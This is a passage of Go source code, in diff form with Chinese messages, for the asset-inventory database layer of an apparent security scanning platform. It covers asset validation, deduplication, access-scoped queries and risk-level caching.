string `json:"last_scan_queue_id,omitempty"` + LastScanTaskID string `json:"last_scan_task_id,omitempty"` + VulnerabilityCount int `json:"vulnerability_count"` + RiskLevel string `json:"risk_level"` + RiskScore int `json:"-"` + OwnerUserID string `json:"-"` +} + +type AssetListFilter struct { + Search string + Status string + Protocol string + ProjectID string + Source string + Tag string + Host string + IP string + Domain string + Port *int + RiskLevel string + MinVulnerabilities *int + MaxVulnerabilities *int + Country string + Province string + City string + ResponsiblePerson string + Department string + BusinessSystem string + Environment string + Criticality string + ScanState string + ScanOverdueDays *int + LastScanBefore *time.Time + LastScanAfter *time.Time + FirstSeenBefore *time.Time + FirstSeenAfter *time.Time + LastSeenBefore *time.Time + LastSeenAfter *time.Time + SortBy string + SortOrder string +} + +type AssetImportResult struct { + Created int `json:"created"` + Updated int `json:"updated"` + Skipped int `json:"skipped"` +} + +func normalizeAsset(a *Asset) { + a.Host = strings.TrimSpace(a.Host) + a.IP = strings.ToLower(strings.TrimSpace(a.IP)) + a.Domain = strings.ToLower(strings.TrimSpace(a.Domain)) + a.Protocol = strings.ToLower(strings.TrimSpace(a.Protocol)) + a.Title = strings.TrimSpace(a.Title) + a.Server = strings.TrimSpace(a.Server) + a.Country = strings.TrimSpace(a.Country) + a.Province = strings.TrimSpace(a.Province) + a.City = strings.TrimSpace(a.City) + a.ResponsiblePerson = strings.TrimSpace(a.ResponsiblePerson) + a.Department = strings.TrimSpace(a.Department) + a.BusinessSystem = strings.TrimSpace(a.BusinessSystem) + a.Environment = strings.ToLower(strings.TrimSpace(a.Environment)) + a.Criticality = strings.ToLower(strings.TrimSpace(a.Criticality)) + a.Source = strings.TrimSpace(a.Source) + a.SourceQuery = strings.TrimSpace(a.SourceQuery) + a.ProjectID = strings.TrimSpace(a.ProjectID) + a.Status = strings.ToLower(strings.TrimSpace(a.Status)) + if a.Status == "" { + a.Status = "active" + } + if a.Source == "" { + a.Source = "manual" + } + seen := map[string]bool{} + tags := make([]string, 0, len(a.Tags)) + for _, tag := range a.Tags { + tag = strings.TrimSpace(tag) + if tag != "" && !seen[tag] { + seen[tag] = true + tags = append(tags, tag) + } + } + a.Tags = tags + // URL 型 Host 是常见输入。缺失的结构化字段在服务端同样补齐,确保 + // API、MCP 与 Web 端产生一致的去重键,而不依赖某个客户端正确解析。 + if strings.Contains(a.Host, "://") { + if parsed, err := url.Parse(a.Host); err == nil && parsed.Hostname() != "" && parsed.User == nil { + hostname := strings.Trim(strings.ToLower(parsed.Hostname()), "[]") + if net.ParseIP(hostname) != nil && a.IP == "" { + a.IP = hostname + } else if a.Domain == "" { + if ascii, err := idna.Lookup.ToASCII(hostname); err == nil { + a.Domain = strings.ToLower(ascii) + } + } + if a.Protocol == "" { + a.Protocol = strings.ToLower(parsed.Scheme) + } + if a.Port == 0 { + if parsed.Port() != "" { + a.Port, _ = strconv.Atoi(parsed.Port()) + } else if a.Protocol == "https" { + a.Port = 443 + } else if a.Protocol == "http" { + a.Port = 80 + } + } + } + } + // Recon providers occasionally return placeholders, multiple values, or + // provider-specific identifiers in structured fields. They are optional + // enrichment; a valid Host must not make the entire batch fail because one + // of those fields is dirty. + if strings.EqualFold(a.Source, "fofa") { + if a.IP != "" && net.ParseIP(strings.Trim(a.IP, "[]")) == nil { + a.IP = "" + } + if a.Domain != "" { + ascii, err := idna.Lookup.ToASCII(strings.TrimSuffix(a.Domain, ".")) + if err != nil || !validAssetDomain(ascii) { + a.Domain = "" + } else { + a.Domain = strings.ToLower(ascii) + } + } + if a.Protocol != "" && !assetProtocolPattern.MatchString(a.Protocol) { + a.Protocol = "" + } + } +} + +var assetProtocolPattern = regexp.MustCompile(`^[a-z][a-z0-9+.-]{0,31}$`) + +// AssetValidationError distinguishes user-correctable asset data from storage failures. +type AssetValidationError struct{ Message string } + +func (e *AssetValidationError) Error() string { return e.Message } + +func assetValidationErrorf(format string, args ...interface{}) error { + return &AssetValidationError{Message: fmt.Sprintf(format, args...)} +} + +func validateAsset(a *Asset) error { + if a == nil { + return assetValidationErrorf("资产不能为空") + } + if a.Host == "" && a.IP == "" && a.Domain == "" { + return assetValidationErrorf("资产目标不能为空") + } + if a.Port < 0 || a.Port > 65535 { + return assetValidationErrorf("端口必须在 0-65535 之间") + } + if a.IP != "" && net.ParseIP(strings.Trim(a.IP, "[]")) == nil { + return assetValidationErrorf("IP 地址格式无效") + } + if a.Domain != "" { + ascii, err := idna.Lookup.ToASCII(strings.TrimSuffix(a.Domain, ".")) + if err != nil || !validAssetDomain(ascii) { + return assetValidationErrorf("域名格式无效") + } + a.Domain = strings.ToLower(ascii) + } + if a.Protocol != "" && !assetProtocolPattern.MatchString(a.Protocol) { + return assetValidationErrorf("协议格式无效") + } + if a.Status != "active" && a.Status != "inactive" { + return assetValidationErrorf("资产状态必须为 active 或 inactive") + } + for name, value := range map[string]string{ + "Host": a.Host, "域名": a.Domain, "协议": a.Protocol, "页面标题": a.Title, + "服务指纹": a.Server, "国家/地区": a.Country, "省份/州": a.Province, "城市": a.City, + "负责人": a.ResponsiblePerson, "部门": a.Department, "业务系统": a.BusinessSystem, + } { + limit := 255 + if name == "Host" || name == "页面标题" { + limit = 500 + } + if utf8.RuneCountInString(value) > limit { + return assetValidationErrorf("%s不能超过 %d 个字符", name, limit) + } + } + if !oneOfAssetValue(a.Environment, "", "production", "staging", "testing", "development", "other") { + return assetValidationErrorf("环境必须为 production、staging、testing、development 或 other") + } + if !oneOfAssetValue(a.Criticality, "", "critical", "high", "medium", "low") { + return assetValidationErrorf("重要性必须为 critical、high、medium 或 low") + } + if len(a.Tags) > 30 { + return assetValidationErrorf("标签不能超过 30 个") + } + for _, tag := range a.Tags { + if utf8.RuneCountInString(tag) > 64 { + return assetValidationErrorf("单个标签不能超过 64 个字符") + } + } + return nil +} + +func oneOfAssetValue(value string, allowed ...string) bool { + for _, candidate := range allowed { + if value == candidate { + return true + } + } + return false +} + +func validAssetDomain(domain string) bool { + domain = strings.TrimSuffix(strings.ToLower(strings.TrimSpace(domain)), ".") + if domain == "" || len(domain) > 253 || net.ParseIP(domain) != nil { + return false + } + for _, label := range strings.Split(domain, ".") { + if len(label) == 0 || len(label) > 63 || label[0] == '-' || label[len(label)-1] == '-' { + return false + } + for _, r := range label { + if (r < 'a' || r > 'z') && (r < '0' || r > '9') && r != '-' { + return false + } + } + } + return true +} + +func assetDedupKey(a *Asset) string { + target := a.Domain + if target == "" { + target = a.IP + } + if target == "" { + target = strings.ToLower(a.Host) + } + return strings.Join([]string{target, strconv.Itoa(a.Port), a.Protocol}, "|") +} + +func appendAssetAccess(query string, args []interface{}, access RBACListAccess, alias string) (string, []interface{}) { + if strings.TrimSpace(access.UserID) == "" || access.Scope == RBACScopeAll { + return query, args + } + prefix := "" + if alias != "" { + prefix = alias + "." + } + query += ` AND (` + prefix + `owner_user_id = ? OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'asset' AND ra.resource_id = ` + prefix + `id + ) OR (` + prefix + `project_id IS NOT NULL AND ` + prefix + `project_id <> '' AND ( + EXISTS (SELECT 1 FROM projects ap WHERE ap.id=` + prefix + `project_id AND ap.owner_user_id=?) + OR EXISTS (SELECT 1 FROM rbac_resource_assignments pra WHERE pra.user_id=? AND pra.resource_type='project' AND pra.resource_id=` + prefix + `project_id) + )))` + return query, append(args, access.UserID, access.UserID, access.UserID, access.UserID) +} + +func (db *DB) UpsertAssets(assets []*Asset, ownerUserID string, allowGlobal ...bool) (AssetImportResult, error) { + result := AssetImportResult{} + tx, err := db.Begin() + if err != nil { + return result, err + } + defer tx.Rollback() + now := time.Now() + for _, asset := range assets { + if asset == nil { + result.Skipped++ + continue + } + normalizeAsset(asset) + if err := validateAsset(asset); err != nil { + return result, fmt.Errorf("第 %d 个资产无效: %w", result.Created+result.Updated+result.Skipped+1, err) + } + key := assetDedupKey(asset) + if key == "|0|" { + result.Skipped++ + continue + } + var existingID string + var existingOwner sql.NullString + err := tx.QueryRow(`SELECT id,owner_user_id FROM assets WHERE dedup_key = ?`, key).Scan(&existingID, &existingOwner) + tagsJSON, _ := json.Marshal(asset.Tags) + if err == sql.ErrNoRows { + asset.ID = uuid.NewString() + asset.FirstSeenAt, asset.LastSeenAt, asset.CreatedAt, asset.UpdatedAt = now, now, now, now + _, err = tx.Exec(`INSERT INTO assets ( + id,dedup_key,project_id,host,ip,port,domain,protocol,title,server,country,province,city,source,source_query,status,tags_json, + responsible_person,department,business_system,environment,criticality, + first_seen_at,last_seen_at,created_at,updated_at,owner_user_id + ) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)`, + asset.ID, key, nullIfEmpty(asset.ProjectID), asset.Host, asset.IP, asset.Port, asset.Domain, asset.Protocol, asset.Title, asset.Server, + asset.Country, asset.Province, asset.City, asset.Source, asset.SourceQuery, asset.Status, string(tagsJSON), + asset.ResponsiblePerson, asset.Department, asset.BusinessSystem, asset.Environment, asset.Criticality, + now, now, now, now, nullIfEmpty(ownerUserID)) + if err != nil { + return result, fmt.Errorf("创建资产失败: %w", err) + } + if ownerUserID != "" { + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_resource_assignments (id,user_id,resource_type,resource_id,created_at) SELECT ?,id,?,?,? FROM rbac_users WHERE id=?`, uuid.NewString(), "asset", asset.ID, now, ownerUserID); err != nil { + return result, fmt.Errorf("授权新资产失败: %w", err) + } + } + result.Created++ + continue + } + if err != nil { + return result, fmt.Errorf("检查资产去重键失败: %w", err) + } + asset.ID = existingID + global := len(allowGlobal) > 0 && allowGlobal[0] + if !global && existingOwner.Valid && strings.TrimSpace(existingOwner.String) != "" && strings.TrimSpace(existingOwner.String) != strings.TrimSpace(ownerUserID) { + result.Skipped++ + continue + } + _, err = tx.Exec(`UPDATE assets SET + host=CASE WHEN ?<>'' THEN ? ELSE host END, ip=CASE WHEN ?<>'' THEN ? ELSE ip END, + domain=CASE WHEN ?<>'' THEN ? ELSE domain END, protocol=CASE WHEN ?<>'' THEN ? ELSE protocol END, + title=CASE WHEN ?<>'' THEN ? ELSE title END, server=CASE WHEN ?<>'' THEN ? ELSE server END, + country=CASE WHEN ?<>'' THEN ? ELSE country END, province=CASE WHEN ?<>'' THEN ? ELSE province END, + city=CASE WHEN ?<>'' THEN ? ELSE city END, source=CASE WHEN ?<>'' THEN ? ELSE source END, + source_query=CASE WHEN ?<>'' THEN ? ELSE source_query END, project_id=CASE WHEN ?<>'' THEN ? ELSE project_id END, + responsible_person=CASE WHEN ?<>'' THEN ? ELSE responsible_person END, + department=CASE WHEN ?<>'' THEN ? ELSE department END, + business_system=CASE WHEN ?<>'' THEN ? ELSE business_system END, + environment=CASE WHEN ?<>'' THEN ? ELSE environment END, + criticality=CASE WHEN ?<>'' THEN ? ELSE criticality END, + tags_json=CASE WHEN ?<>'[]' THEN ? ELSE tags_json END, + last_seen_at=?, updated_at=? WHERE id=?`, + asset.Host, asset.Host, asset.IP, asset.IP, asset.Domain, asset.Domain, asset.Protocol, asset.Protocol, + asset.Title, asset.Title, asset.Server, asset.Server, asset.Country, asset.Country, asset.Province, asset.Province, + asset.City, asset.City, asset.Source, asset.Source, asset.SourceQuery, asset.SourceQuery, asset.ProjectID, nullIfEmpty(asset.ProjectID), + asset.ResponsiblePerson, asset.ResponsiblePerson, asset.Department, asset.Department, asset.BusinessSystem, asset.BusinessSystem, + asset.Environment, asset.Environment, asset.Criticality, asset.Criticality, string(tagsJSON), string(tagsJSON), + now, now, existingID) + if err != nil { + return result, fmt.Errorf("更新资产失败: %w", err) + } + if ownerUserID != "" && (!existingOwner.Valid || strings.TrimSpace(existingOwner.String) == ownerUserID) { + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_resource_assignments (id,user_id,resource_type,resource_id,created_at) SELECT ?,id,?,?,? FROM rbac_users WHERE id=?`, uuid.NewString(), "asset", existingID, now, ownerUserID); err != nil { + return result, fmt.Errorf("授权资产失败: %w", err) + } + } + result.Updated++ + } + if err := tx.Commit(); err != nil { + return result, err + } + return result, nil +} + +func assetWhere(filter AssetListFilter, access RBACListAccess) (string, []interface{}) { + query := " WHERE 1=1" + args := []interface{}{} + if q := strings.TrimSpace(filter.Search); q != "" { + pattern := "%" + escapeAssetLike(strings.ToLower(q)) + "%" + query += ` AND (LOWER(assets.host) LIKE ? ESCAPE '\' OR LOWER(assets.ip) LIKE ? ESCAPE '\' OR LOWER(assets.domain) LIKE ? ESCAPE '\' + OR LOWER(assets.title) LIKE ? ESCAPE '\' OR LOWER(assets.server) LIKE ? ESCAPE '\' OR LOWER(assets.tags_json) LIKE ? ESCAPE '\' + OR LOWER(assets.responsible_person) LIKE ? ESCAPE '\' OR LOWER(assets.department) LIKE ? ESCAPE '\' OR LOWER(assets.business_system) LIKE ? ESCAPE '\')` + for i := 0; i < 9; i++ { + args = append(args, pattern) + } + } + if filter.Status != "" { + query += " AND assets.status = ?" + args = append(args, filter.Status) + } + if filter.Protocol != "" { + query += " AND assets.protocol = ?" + args = append(args, filter.Protocol) + } + if filter.ProjectID != "" { + query += " AND assets.project_id = ?" + args = append(args, filter.ProjectID) + } + if filter.Source != "" { + query += " AND LOWER(assets.source) = LOWER(?)" + args = append(args, strings.TrimSpace(filter.Source)) + } + if tag := strings.TrimSpace(filter.Tag); tag != "" { + pattern := "%\"" + escapeAssetLike(strings.ToLower(tag)) + "\"%" + query += ` AND LOWER(assets.tags_json) LIKE ? ESCAPE '\'` + args = append(args, pattern) + } + if filter.Host != "" { + query += " AND LOWER(assets.host) = LOWER(?)" + args = append(args, strings.TrimSpace(filter.Host)) + } + if filter.IP != "" { + query += " AND LOWER(assets.ip) = LOWER(?)" + args = append(args, strings.TrimSpace(filter.IP)) + } + if filter.Domain != "" { + query += " AND LOWER(assets.domain) = LOWER(?)" + args = append(args, strings.TrimSpace(filter.Domain)) + } + if filter.Port != nil { + query += " AND assets.port = ?" + args = append(args, *filter.Port) + } + if filter.RiskLevel != "" { + query += " AND " + assetRiskLevelCachedExpr + " = ?" + args = append(args, strings.ToLower(strings.TrimSpace(filter.RiskLevel))) + } + if filter.MinVulnerabilities != nil { + query += " AND " + assetVulnerabilityCountCachedExpr + " >= ?" + args = append(args, *filter.MinVulnerabilities) + } + if filter.MaxVulnerabilities != nil { + query += " AND " + assetVulnerabilityCountCachedExpr + " <= ?" + args = append(args, *filter.MaxVulnerabilities) + } + for _, item := range []struct { + column string + value string + }{ + {"assets.country", filter.Country}, {"assets.province", filter.Province}, {"assets.city", filter.City}, + {"assets.responsible_person", filter.ResponsiblePerson}, {"assets.department", filter.Department}, + {"assets.business_system", filter.BusinessSystem}, {"assets.environment", filter.Environment}, {"assets.criticality", filter.Criticality}, + } { + if strings.TrimSpace(item.value) != "" { + query += " AND LOWER(" + item.column + ") = LOWER(?)" + args = append(args, strings.TrimSpace(item.value)) + } + } + switch strings.ToLower(strings.TrimSpace(filter.ScanState)) { + case "never": + query += " AND " + assetEffectiveLastScanExpr + " IS NULL" + case "scanned": + query += " AND " + assetEffectiveLastScanExpr + " IS NOT NULL" + } + if filter.ScanOverdueDays != nil { + query += " AND (" + assetEffectiveLastScanExpr + " IS NULL OR datetime(" + assetEffectiveLastScanExpr + ") < datetime('now', ?))" + args = append(args, fmt.Sprintf("-%d days", *filter.ScanOverdueDays)) + } + if filter.LastScanBefore != nil { + query += " AND " + assetEffectiveLastScanExpr + " < ?" + args = append(args, *filter.LastScanBefore) + } + if filter.LastScanAfter != nil { + query += " AND " + assetEffectiveLastScanExpr + " > ?" + args = append(args, *filter.LastScanAfter) + } + if filter.FirstSeenBefore != nil { + query += " AND assets.first_seen_at < ?" + args = append(args, *filter.FirstSeenBefore) + } + if filter.FirstSeenAfter != nil { + query += " AND assets.first_seen_at > ?" + args = append(args, *filter.FirstSeenAfter) + } + if filter.LastSeenBefore != nil { + query += " AND assets.last_seen_at < ?" + args = append(args, *filter.LastSeenBefore) + } + if filter.LastSeenAfter != nil { + query += " AND assets.last_seen_at > ?" + args = append(args, *filter.LastSeenAfter) + } + return appendAssetAccess(query, args, access, "assets") +} + +func escapeAssetLike(value string) string { + value = strings.ReplaceAll(value, `\`, `\\`) + value = strings.ReplaceAll(value, `%`, `\%`) + return strings.ReplaceAll(value, `_`, `\_`) +} + +func scanAsset(scanner interface{ Scan(...interface{}) error }) (*Asset, error) { + var a Asset + var tags string + var lastScanAt interface{} + err := scanner.Scan(&a.ID, &a.ProjectID, &a.ProjectName, &a.Host, &a.IP, &a.Port, &a.Domain, &a.Protocol, &a.Title, &a.Server, &a.Country, + &a.Province, &a.City, &a.ResponsiblePerson, &a.Department, &a.BusinessSystem, &a.Environment, &a.Criticality, + &a.Source, &a.SourceQuery, &a.Status, &tags, &a.FirstSeenAt, &a.LastSeenAt, &a.CreatedAt, &a.UpdatedAt, + &lastScanAt, &a.LastScanConversationID, &a.LastScanQueueID, &a.LastScanTaskID, &a.VulnerabilityCount, &a.RiskLevel) + if err != nil { + return nil, err + } + if parsed, ok := parseAssetScanTime(lastScanAt); ok { + a.LastScanAt = &parsed + } + _ = json.Unmarshal([]byte(tags), &a.Tags) + return &a, nil +} + +func parseAssetScanTime(value interface{}) (time.Time, bool) { + if value == nil { + return time.Time{}, false + } + if parsed, ok := value.(time.Time); ok { + return parsed, true + } + var raw string + switch typed := value.(type) { + case string: + raw = typed + case []byte: + raw = string(typed) + default: + raw = fmt.Sprint(typed) + } + for _, layout := range []string{ + time.RFC3339Nano, + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999Z07:00", + "2006-01-02 15:04:05-07:00", + "2006-01-02 15:04:05", + } { + if parsed, err := time.Parse(layout, strings.TrimSpace(raw)); err == nil { + return parsed, true + } + } + return time.Time{}, false +} + +const assetEffectiveLastScanExpr = `COALESCE( + (SELECT bt.completed_at FROM batch_tasks bt WHERE bt.id=assets.last_scan_task_id AND bt.completed_at IS NOT NULL LIMIT 1), + (SELECT MAX(m.updated_at) FROM messages m WHERE m.conversation_id=assets.last_scan_conversation_id AND m.role='assistant'), + assets.last_scan_at + )` + +const assetVulnerabilityMatchExpr = `( + (COALESCE(assets.last_scan_conversation_id,'')<>'' AND v.conversation_id=assets.last_scan_conversation_id) + OR (COALESCE(assets.last_scan_task_id,'')<>'' AND EXISTS ( + SELECT 1 FROM batch_tasks bt WHERE bt.id=assets.last_scan_task_id AND bt.conversation_id=v.conversation_id + )) +)` + +const assetVulnerabilityCountExpr = `(SELECT COUNT(DISTINCT v.id) FROM vulnerabilities v WHERE ` + assetVulnerabilityMatchExpr + `)` + +const assetRiskScoreQueryExpr = `COALESCE(( + SELECT MAX(CASE LOWER(COALESCE(v.severity,'')) WHEN 'critical' THEN 5 WHEN 'high' THEN 4 WHEN 'medium' THEN 3 WHEN 'low' THEN 2 WHEN 'info' THEN 1 ELSE 0 END) + FROM vulnerabilities v + WHERE LOWER(COALESCE(v.status,'open')) NOT IN ('fixed','false_positive','ignored') AND ` + assetVulnerabilityMatchExpr + ` +),0)` + +const assetRiskLevelQueryExpr = `(CASE WHEN ` + assetEffectiveLastScanExpr + ` IS NULL THEN 'unassessed' ELSE CASE ` + assetRiskScoreQueryExpr + ` + WHEN 5 THEN 'critical' WHEN 4 THEN 'high' WHEN 3 THEN 'medium' WHEN 2 THEN 'low' WHEN 1 THEN 'info' ELSE 'normal' END END)` + +const assetVulnerabilityCountCachedExpr = `COALESCE(assets.vulnerability_count,0)` +const assetRiskScoreCachedExpr = `COALESCE(assets.risk_score,0)` +const assetRiskLevelCachedExpr = `COALESCE(NULLIF(assets.risk_level,''),'unassessed')` + +const assetSelectColumns = `assets.id,COALESCE(assets.project_id,''),COALESCE(p.name,''),assets.host,assets.ip,assets.port,assets.domain,assets.protocol,assets.title,assets.server,assets.country, + assets.province,assets.city,assets.responsible_person,assets.department,assets.business_system,assets.environment,assets.criticality, + assets.source,assets.source_query,assets.status,assets.tags_json,assets.first_seen_at,assets.last_seen_at,assets.created_at,assets.updated_at, + ` + assetEffectiveLastScanExpr + `,COALESCE(assets.last_scan_conversation_id,''),COALESCE(assets.last_scan_queue_id,''),COALESCE(assets.last_scan_task_id,''), + ` + assetVulnerabilityCountCachedExpr + `,` + assetRiskLevelCachedExpr + +// MarkAssetScanned links an asset to the conversation or batch subtask created from it. +// The link lets the asset list show the latest scan time and vulnerabilities produced by that scan. +func (db *DB) MarkAssetScanned(id, conversationID, queueID, taskID string, access RBACListAccess) error { + where, args := appendAssetAccess(" WHERE id = ?", []interface{}{strings.TrimSpace(id)}, access, "assets") + res, err := db.Exec(`UPDATE assets SET last_scan_at=?,last_scan_conversation_id=?,last_scan_queue_id=?,last_scan_task_id=?,updated_at=?`+where, + append([]interface{}{time.Now(), strings.TrimSpace(conversationID), strings.TrimSpace(queueID), strings.TrimSpace(taskID), time.Now()}, args...)...) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return sql.ErrNoRows + } + if err := db.RefreshAssetRiskCache(id); err != nil { + return err + } + return nil +} + +// CompleteAssetScan records completion from inside an Agent conversation. If +// the asset was launched as a batch task, keep its task/queue link only when +// that task belongs to the current conversation; a later ad-hoc chat scan must +// not retain stale task associations. +func (db *DB) CompleteAssetScan(id, conversationID string, access RBACListAccess) error { + id = strings.TrimSpace(id) + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return fmt.Errorf("扫描对话不能为空") + } + where, args := appendAssetAccess(" WHERE id = ?", []interface{}{id}, access, "assets") + now := time.Now() + res, err := db.Exec(`UPDATE assets SET + last_scan_at=?,last_scan_conversation_id=?, + last_scan_queue_id=CASE WHEN EXISTS (SELECT 1 FROM batch_tasks bt WHERE bt.id=assets.last_scan_task_id AND bt.conversation_id=?) THEN last_scan_queue_id ELSE '' END, + last_scan_task_id=CASE WHEN EXISTS (SELECT 1 FROM batch_tasks bt WHERE bt.id=assets.last_scan_task_id AND bt.conversation_id=?) THEN last_scan_task_id ELSE '' END, + updated_at=?`+where, + append([]interface{}{now, conversationID, conversationID, conversationID, now}, args...)...) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return sql.ErrNoRows + } + if err := db.RefreshAssetRiskCache(id); err != nil { + return err + } + return nil +} + +func (db *DB) BatchTaskBelongsToQueue(taskID, queueID string) bool { + var count int + err := db.QueryRow(`SELECT COUNT(*) FROM batch_tasks WHERE id=? AND queue_id=?`, strings.TrimSpace(taskID), strings.TrimSpace(queueID)).Scan(&count) + return err == nil && count > 0 +} + +func assetRiskLevelFromScore(score int, scanned bool) string { + if !scanned { + return "unassessed" + } + switch score { + case 5: + return "critical" + case 4: + return "high" + case 3: + return "medium" + case 2: + return "low" + case 1: + return "info" + default: + return "normal" + } +} + +// RefreshAssetRiskCache recalculates the denormalized fields used by the asset +// list. Keeping this in the database layer makes Web API and MCP writes share +// one consistency path. +func (db *DB) RefreshAssetRiskCache(assetID string) error { + assetID = strings.TrimSpace(assetID) + if assetID == "" { + return nil + } + var count int + if err := db.QueryRow("SELECT "+assetVulnerabilityCountExpr+" FROM assets WHERE assets.id=?", assetID).Scan(&count); err != nil { + if err == sql.ErrNoRows { + return nil + } + return fmt.Errorf("刷新资产漏洞数量失败: %w", err) + } + var score int + if err := db.QueryRow("SELECT "+assetRiskScoreQueryExpr+" FROM assets WHERE assets.id=?", assetID).Scan(&score); err != nil { + return fmt.Errorf("刷新资产风险分数失败: %w", err) + } + var lastScan interface{} + if err := db.QueryRow("SELECT "+assetEffectiveLastScanExpr+" FROM assets WHERE assets.id=?", assetID).Scan(&lastScan); err != nil { + return fmt.Errorf("刷新资产扫描状态失败: %w", err) + } + level := assetRiskLevelFromScore(score, lastScan != nil) + if _, err := db.Exec(`UPDATE assets SET vulnerability_count=?, risk_score=?, risk_level=? WHERE id=?`, count, score, level, assetID); err != nil { + return fmt.Errorf("更新资产风险缓存失败: %w", err) + } + return nil +} + +func (db *DB) RefreshAllAssetRiskCache() error { + rows, err := db.Query(`SELECT id FROM assets`) + if err != nil { + return fmt.Errorf("查询资产列表失败: %w", err) + } + defer rows.Close() + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + return err + } + if err := db.RefreshAssetRiskCache(id); err != nil { + return err + } + } + return rows.Err() +} + +func (db *DB) AssetIDsForVulnerabilityConversations(conversationIDs []string) ([]string, error) { + seen := map[string]struct{}{} + cleaned := make([]string, 0, len(conversationIDs)) + for _, id := range conversationIDs { + id = strings.TrimSpace(id) + if id == "" { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + cleaned = append(cleaned, id) + } + if len(cleaned) == 0 { + return nil, nil + } + placeholders := strings.TrimRight(strings.Repeat("?,", len(cleaned)), ",") + args := make([]interface{}, 0, len(cleaned)*2) + for _, id := range cleaned { + args = append(args, id) + } + for _, id := range cleaned { + args = append(args, id) + } + rows, err := db.Query(`SELECT DISTINCT assets.id FROM assets + WHERE assets.last_scan_conversation_id IN (`+placeholders+`) + OR assets.last_scan_task_id IN (SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id IN (`+placeholders+`))`, args...) + if err != nil { + return nil, fmt.Errorf("查询受影响资产失败: %w", err) + } + defer rows.Close() + assetIDs := []string{} + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + return nil, err + } + assetIDs = append(assetIDs, id) + } + return assetIDs, rows.Err() +} + +func (db *DB) RefreshAssetRiskCacheForConversations(conversationIDs ...string) error { + assetIDs, err := db.AssetIDsForVulnerabilityConversations(conversationIDs) + if err != nil { + return err + } + for _, id := range assetIDs { + if err := db.RefreshAssetRiskCache(id); err != nil { + return err + } + } + return nil +} + +func (db *DB) refreshAssetRiskCacheForConversationsBestEffort(conversationIDs ...string) { + if err := db.RefreshAssetRiskCacheForConversations(conversationIDs...); err != nil && db.logger != nil { + db.logger.Warn("刷新资产风险缓存失败", zap.Error(err)) + } +} + +func (db *DB) ListAssets(limit, offset int, filter AssetListFilter, access RBACListAccess) ([]*Asset, int, error) { + if limit < 1 { + limit = 20 + } + if limit > 100 { + limit = 100 + } + if offset < 0 { + offset = 0 + } + where, args := assetWhere(filter, access) + var total int + if err := db.QueryRow("SELECT COUNT(*) FROM assets"+where, args...).Scan(&total); err != nil { + return nil, 0, err + } + orderBy := assetOrderBy(filter.SortBy, filter.SortOrder) + rows, err := db.Query("SELECT "+assetSelectColumns+" FROM assets LEFT JOIN projects p ON p.id=assets.project_id"+where+" ORDER BY "+orderBy+" LIMIT ? OFFSET ?", append(args, limit, offset)...) + if err != nil { + return nil, 0, err + } + defer rows.Close() + items := []*Asset{} + for rows.Next() { + a, err := scanAsset(rows) + if err != nil { + return nil, 0, err + } + items = append(items, a) + } + return items, total, rows.Err() +} + +// ListAssetsForOperation resolves the complete filtered selection used by +// cross-page bulk actions. The caller supplies a strict upper bound. +func (db *DB) ListAssetsForOperation(limit int, filter AssetListFilter, access RBACListAccess) ([]*Asset, int, error) { + if limit < 1 || limit > 10000 { + limit = 10000 + } + where, args := assetWhere(filter, access) + var total int + if err := db.QueryRow("SELECT COUNT(*) FROM assets"+where, args...).Scan(&total); err != nil { + return nil, 0, err + } + if total > limit { + return nil, total, fmt.Errorf("匹配资产超过 %d 条,请缩小筛选范围", limit) + } + rows, err := db.Query("SELECT "+assetSelectColumns+" FROM assets LEFT JOIN projects p ON p.id=assets.project_id"+where+" ORDER BY "+assetOrderBy(filter.SortBy, filter.SortOrder), args...) + if err != nil { + return nil, 0, err + } + defer rows.Close() + items := make([]*Asset, 0, total) + for rows.Next() { + item, err := scanAsset(rows) + if err != nil { + return nil, 0, err + } + items = append(items, item) + } + return items, total, rows.Err() +} + +func assetOrderBy(sortBy, sortOrder string) string { + direction := "DESC" + if strings.EqualFold(strings.TrimSpace(sortOrder), "asc") { + direction = "ASC" + } + var expression string + switch strings.ToLower(strings.TrimSpace(sortBy)) { + case "last_scan_at": + expression = assetEffectiveLastScanExpr + // For oldest-first queries, assets that have never been scanned are the + // most overdue and intentionally appear first. NULLs stay last for DESC. + if direction == "ASC" { + return "CASE WHEN " + expression + " IS NULL THEN 0 ELSE 1 END ASC, " + expression + " ASC, assets.id ASC" + } + return "CASE WHEN " + expression + " IS NULL THEN 1 ELSE 0 END ASC, " + expression + " DESC, assets.id ASC" + case "first_seen_at": + expression = "assets.first_seen_at" + case "created_at": + expression = "assets.created_at" + case "updated_at": + expression = "assets.updated_at" + case "host": + expression = "LOWER(assets.host)" + case "port": + expression = "assets.port" + case "vulnerability_count": + expression = assetVulnerabilityCountCachedExpr + case "risk_level": + expression = assetRiskScoreCachedExpr + default: + expression = "assets.last_seen_at" + } + return expression + " " + direction + ", assets.id ASC" +} + +func (db *DB) GetAsset(id string, access RBACListAccess) (*Asset, error) { + query, args := appendAssetAccess("SELECT "+assetSelectColumns+" FROM assets LEFT JOIN projects p ON p.id=assets.project_id WHERE assets.id = ?", []interface{}{id}, access, "assets") + return scanAsset(db.QueryRow(query, args...)) +} + +func (db *DB) UpdateAsset(id string, a *Asset, access RBACListAccess) error { + normalizeAsset(a) + if err := validateAsset(a); err != nil { + return err + } + key := assetDedupKey(a) + if key == "|0|" { + return fmt.Errorf("资产目标不能为空") + } + tags, _ := json.Marshal(a.Tags) + where, args := appendAssetAccess(" WHERE id = ?", []interface{}{id}, access, "assets") + res, err := db.Exec(`UPDATE assets SET dedup_key=?,project_id=?,host=?,ip=?,port=?,domain=?,protocol=?,title=?,server=?,country=?,province=?,city=?, + responsible_person=?,department=?,business_system=?,environment=?,criticality=?,source=?,source_query=?,status=?,tags_json=?,updated_at=?`+where, + append([]interface{}{key, nullIfEmpty(a.ProjectID), a.Host, a.IP, a.Port, a.Domain, 